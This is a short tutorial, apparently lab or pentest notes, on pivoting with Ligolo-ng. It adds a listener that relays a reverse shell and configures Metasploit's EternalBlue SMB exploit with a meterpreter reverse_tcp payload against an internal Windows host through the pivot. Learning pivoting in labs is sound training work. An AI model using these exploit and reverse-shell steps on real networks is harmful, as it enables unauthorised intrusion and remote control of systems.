Skip to content

Ligolo Reverse tunnel

Since you are using Ligolo-ng, the setup is significantly cleaner than SSH tunneling because Ligolo-ng operates at the TUN interface (Layer 3) level. This means you don't have to "trick" Metasploit with 127.0.0.1. You can talk to the Windows IP directly.

However, for the Reverse Shell, you still need to tell the Windows target to send its connection to the Ligolo-ng agent (the Pivot), which will then relay it back to your AttackBox.

The Strategy

  1. Direct Routing: Use your Ligolo TUN interface to hit the Windows RHOST directly.

  2. Ligolo Listener: Set up a listener inside the Ligolo-ng proxy to catch the reverse shell on the Pivot and redirect it to your AttackBox.

Step 1: Set up the Ligolo Listener

On your AttackBox (inside the ligolo-proxy terminal), you need to create a listener that lives on the Agent (Pivot).

Bash

# Inside the ligolo-proxy session
ligolo > listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:4444

  • --addr 0.0.0.0:8080: Tells the Linux Pivot (Agent) to listen on port 8080 for the Windows shell.

  • --to 127.0.0.1:4444: Redirects that traffic to port 4444 on your AttackBox.

Step 2: Configure Metasploit

Because Ligolo-ng provides a real network route to the internal subnet, you can use the actual Windows IP for RHOSTS.

Code snippet

use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# 1. Target the Windows machine directly (thanks to Ligolo routing)
set RHOSTS [INTERNAL_WINDOWS_IP]

# 2. Tell the payload to call back to the Linux Pivot's IP
set LHOST [LINUX_PIVOT_INTERNAL_IP]
set LPORT 8080

# 3. Tell Metasploit where the shell will actually land on your box
set ReverseListenerBindAddress 127.0.0.1
set ReverseListenerBindPort 4444

exploit

Why this is better than SSH

  • No Port Conflicts: You don't have to worry about your local port 445 being in use because you aren't forwarding to localhost. You are routing through the ligolo TUN adapter.

  • Scanning: You can run nmap or other tools against the real Windows IP address as if it were on your own network.

Troubleshooting Checklist

  • TUN Interface: Ensure you have added the route to your AttackBox's routing table (e.g., sudo ip route add 192.168.1.0/24 dev ligolo).

  • Agent Permissions: The Ligolo-ng agent on the Linux Pivot usually needs to run with high privileges (sudo/root) to bind to ports and handle the listener properly.

  • Windows Firewall: If the exploit launches but the shell never comes back, ensure the Windows machine can "see" the Linux Pivot on port 8080.